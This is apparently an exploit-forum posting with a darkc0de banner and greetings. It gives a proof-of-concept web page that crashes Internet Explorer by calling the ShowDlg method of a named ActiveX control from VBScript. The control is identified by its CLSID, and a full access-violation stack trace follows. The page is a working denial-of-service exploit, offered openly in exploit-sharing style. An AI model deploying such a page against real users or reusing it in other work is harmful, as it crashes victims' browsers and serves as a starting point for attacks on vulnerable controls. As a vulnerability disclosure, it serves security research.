################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# Greetz to all Darkc0de ,AI, AH,ICW Memebers
#Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,zerocode,dalsim,7, Anirban , Anas, Navneet ,Varun, Dilip, Manish
#Special Thanks to r45c4l for allowing analysis on his product
#RegKey Safe for Script: False
#RegKey Safe for Init: False
#Implements IObjectSafety: True
<html>
Test DoS Page
<object classid='clsid:CDF8A044-74AF-4045-AE13-D8AEDF802538' id='target' ></object>
<script language='vbscript'>
arg1=String(1, "A")
target.ShowDlg arg1
</script>
Access violation exception (0xC0000005) when trying to read from memory location 0x00000020 in the thread below.
Function Arg 1 Arg 2 Arg 3 Source
TargetControl+145d0 0000000f 00000000 00000000
mfc80u!CWnd::WindowProc+22 0000000f 00000000 00000000
mfc80u!AfxCallWndProc+a3 00000000 003008d0 0000000f
mfc80u!AfxWndProc+35 003008d0 0000000f 00000000
TargetControl!DllGetClassObject+c1a2 003008d0 0000000f 00000000
user32!InternalCallWinProc+28 05987d5f 003008d0 0000000f
user32!UserCallWinProcCheckWow+150 03c6a110 05987d5f 003008d0
user32!DispatchClientMessage+a3 0068d978 0000000f 00000000
user32!__fnDWORD+24 0013debc 00000018 0068d978
ntdll!KiUserCallbackDispatcher+13 7e42aedc 003e08f6 0000005e
user32!NtUserCallHwndLock+c 003e08f6 0694e16c 0013df74
mfc80u!CWnd::RunModalLoop+77 00000004 4aba760d 00000000
mfc80u!CDialog::DoModal+129 4ab791a2 05540874 00000000
TargetControl+ef9f 0694db40 0000001c 00000004
oleaut32!CTypeInfo2::Invoke+234 03c7491c 0694db40 00000000
TargetControl+11c58 0694db40 00000001 00000409
mshtml!COleSite::ContextInvokeEx+149 0414b6f0 00000001 00000409
mshtml!COleSite::ContextThunk_InvokeEx+44 0414b6f0 00000001 00000409
vbscript!IDispatchExInvokeEx2+a9 0003b8d8 0414ce50 00000001
vbscript!IDispatchExInvokeEx+56 0003b8d8 0414ce50 00000001
vbscript!InvokeDispatch+101 0003b8d8 0003b990 00000001
vbscript!InvokeByName+42 0003b8d8 0414ce50 00000001
vbscript!CScriptRuntime::RunNoEH+234c 0013e6a4 4aab5064 00000000
vbscript!CScriptRuntime::Run+62 0013e6a4 0003fd08 0003b8d8
vbscript!CScriptEntryPoint::Call+51 0013e6a4 00000000 00000000
vbscript!CSession::Execute+c8 0003fd08 0013e888 00000000
vbscript!COleScript::ExecutePendingScripts+144 0013e888 0013e868 0003e454
vbscript!COleScript::ParseScriptTextCore+243 0414cd54 0414a394 00000000
vbscript!COleScript::ParseScriptText+2b 0003e454 0414cd54 0414a394
mshtml!CScriptCollection::ParseScriptText+1da 0414ca90 73301e34 00000000
mshtml!CScriptElement::CommitCode+1e1 00000000 00000000 00000000
mshtml!CScriptElement::Execute+a4 0414a520 06194d97 00000000
mshtml!CHtmParse::Execute+41 0414a5e0 0414a520 7dcc4b65
mshtml!CHtmPost::Broadcast+d 7dcc4b83 06194d97 0414a520
mshtml!CHtmPost::Exec+32b 06194d97 0414a520 04140810
mshtml!CHtmPost::Run+12 06194d97 04140810 06194ccf
mshtml!PostManExecute+51 04140810 06194d97 0414a520
mshtml!PostManOnTimer+76 00250938 00000113 00001003
user32!InternalCallWinProc+28 7dcfb9d8 00250938 00000113
user32!UserCallWinProc+f3 00000000 7dcfb9d8 00250938
user32!DispatchMessageWorker+10e 0013eb90 00000000 0013eb78
user32!DispatchMessageW+f 0013eb90 00000000 00163468
browseui!TimedDispatchMessage+33 0013eb90 0013ee98 00000000
browseui!BrowserThreadProc+336 00162ca8 0013ee98 00162ca8
browseui!BrowserProtectedThreadProc+50 00162ca8 00162ca8 00000000
browseui!SHOpenFolderWindow+22c 00162ca8 00000000 00000000
shdocvw!IEWinMain+133 001523ba 00000001 0140d0b8
iexplore!WinMainT+2de 00400000 00000000 001523ba
iexplore!_ModuleEntry+99 0140d0b8 00000018 7ffdf000
kernel32!BaseProcessStart+23 00402451 00000000 78746341